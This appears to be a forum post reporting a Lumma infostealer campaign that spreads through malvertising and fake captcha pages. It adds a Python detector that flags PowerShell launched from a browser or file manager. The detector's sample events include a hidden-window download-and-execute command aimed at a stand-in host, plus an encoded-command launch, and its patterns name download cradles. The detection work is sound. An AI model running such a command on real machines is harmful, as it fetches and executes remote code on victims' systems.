OP 17 December, 2024 - 07:01 AM
A new large-scale campaign to distribute Lumma malware (of the "infostealer" class) through fake captcha pages has been uncovered by researchers from Guardio Labs and Infoblox. Attackers use "malvertising" — the deliberate placement of malicious ads that exploit vulnerabilities in the digital advertising ecosystem. As a result, thousands of victims are at risk of identity theft and financial loss.
According to the study, the campaign relies on the Monetag advertising platform (a subsidiary of PropellerAds) to distribute fake captcha pages. Users encounter these fake pages while browsing seemingly harmless sites where they are asked to verify their identity by passing the 'I am not a robot' verification.
When the visitor completes this check, a PowerShell script runs in the background and installs the malware. The program is aimed at stealing sensitive data: social-network logins, banking information, and personal files.
Key findings of the study:
Large-scale reach: over 1 million ad impressions per day, while traffic is redirected through more than 3000 sites.
Malware delivery mechanism: Redirect chains and hidden scripts inject fake captcha pages through advertising networks.
Advanced concealment: Attackers used services such as BeMob to disguise malicious intentions from ad platform moderators.
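The article says the fake captcha ends with a PowerShell script running in the background. As an added example, not code from the article or from the researchers, here is a small Python detector run over constructed process-creation log lines: it flags PowerShell launched from a user-facing parent (file manager or browser) whose command line carries hidden-window, encoded-command or download-and-execute indicators. The log format, the parent-process list and the indicator weights are assumptions made for this example.

```python
import re

# Constructed process-creation events, tab-separated key=value fields loosely modelled on
# Sysmon Event ID 1. They are assumptions made for this example, not telemetry from the campaign.
SAMPLE_EVENTS = [
    "ParentImage=C:\\Windows\\explorer.exe\tImage=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
    "\tCommandLine=powershell -w hidden -ep bypass -c \"iwr http://captcha-verify.invalid/check | iex\"",
    "ParentImage=C:\\Windows\\explorer.exe\tImage=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
    "\tCommandLine=powershell -EncodedCommand SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA",
    "ParentImage=C:\\Program Files\\Git\\git-bash.exe\tImage=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
    "\tCommandLine=powershell -File C:\\build\\deploy.ps1",
    "ParentImage=C:\\Windows\\explorer.exe\tImage=C:\\Windows\\System32\\notepad.exe\tCommandLine=notepad.exe",
]
# Parents that indicate a user-driven launch (file manager / Run dialog or a browser). Assumed list.
USER_FACING_PARENTS = {"explorer.exe", "chrome.exe", "msedge.exe", "firefox.exe"}
# Indicator -> (regex, weight). Weights are a judgement call for this example, not a published rule.
INDICATORS = {
    "hidden_window":   (re.compile(r"-w(indowstyle)?\s+hidden", re.I), 2),
    "encoded_command": (re.compile(r"-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I), 2),
    "download_cradle": (re.compile(r"\b(iwr|invoke-webrequest|downloadstring|net\.webclient)\b", re.I), 1),
    "inline_eval":     (re.compile(r"\b(iex|invoke-expression)\b", re.I), 1),
    "policy_bypass":   (re.compile(r"-e(p|xecutionpolicy)\s+bypass", re.I), 1),
}

def parse_event(line: str) -> dict:
    """Split one constructed event line into a field dictionary."""
    return dict(field.split("=", 1) for field in line.split("\t"))

def score_event(event: dict) -> tuple[int, list[str]]:
    """Score a PowerShell launch from a user-facing parent; any other process scores 0."""
    image = event.get("Image", "").rsplit("\\", 1)[-1].lower()
    parent = event.get("ParentImage", "").rsplit("\\", 1)[-1].lower()
    if image not in {"powershell.exe", "pwsh.exe"} or parent not in USER_FACING_PARENTS:
        return 0, []
    cmd = event.get("CommandLine", "")
    hits = [name for name, (pattern, _) in INDICATORS.items() if pattern.search(cmd)]
    return sum(INDICATORS[name][1] for name in hits), hits

def find_suspicious(lines, threshold: int = 2) -> list[tuple[str, list[str]]]:
    """Return (CommandLine, matched indicators) for every event scoring at or above threshold."""
    findings = []
    for line in lines:
        event = parse_event(line)
        score, hits = score_event(event)
        if score >= threshold:
            findings.append((event["CommandLine"], hits))
    return findings
```

Calling `find_suspicious(SAMPLE_EVENTS)` flags the hidden download-and-execute launch and the encoded launch, while the build script started from git-bash and the notepad launch pass through.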
The role of ad networks
Guardio Labs notes that the infrastructure of ad networks like Monetag facilitates such campaigns. Monetag ad scripts use traffic distribution systems (TDS) that analyze visitors and optimize ad placement. These mechanisms, originally designed for legitimate advertising, are used to distribute harmful content en masse.
Malvertising campaigns thrive because responsibility is blurred: ad networks, tracking services, website publishers, and hosting providers each play a part, but often disclaim direct responsibility. Attackers exploit these "blind spots" by first getting harmless creatives approved and then swapping them for malicious ones.
For more information on combating malvertising, see the NCSC Guidelines "NCSC Publishes Tips to Tackle Malvertising Threat".
"This fake captcha campaign is just one example that demonstrates the shadow side of the Internet's advertising ecosystem," Guardio Labs warns. "As long as advertising remains the cornerstone of the modern internet, the advertising ecosystem itself faces serious conflicts of interest that create a security breach and put users at risk."
Following the publication of the investigation, Monetag and BeMob took action by banning more than 200 accounts associated with the campaign. However, experts emphasize the need for proactive measures, such as constant content moderation and stricter account validation, to prevent new abuses.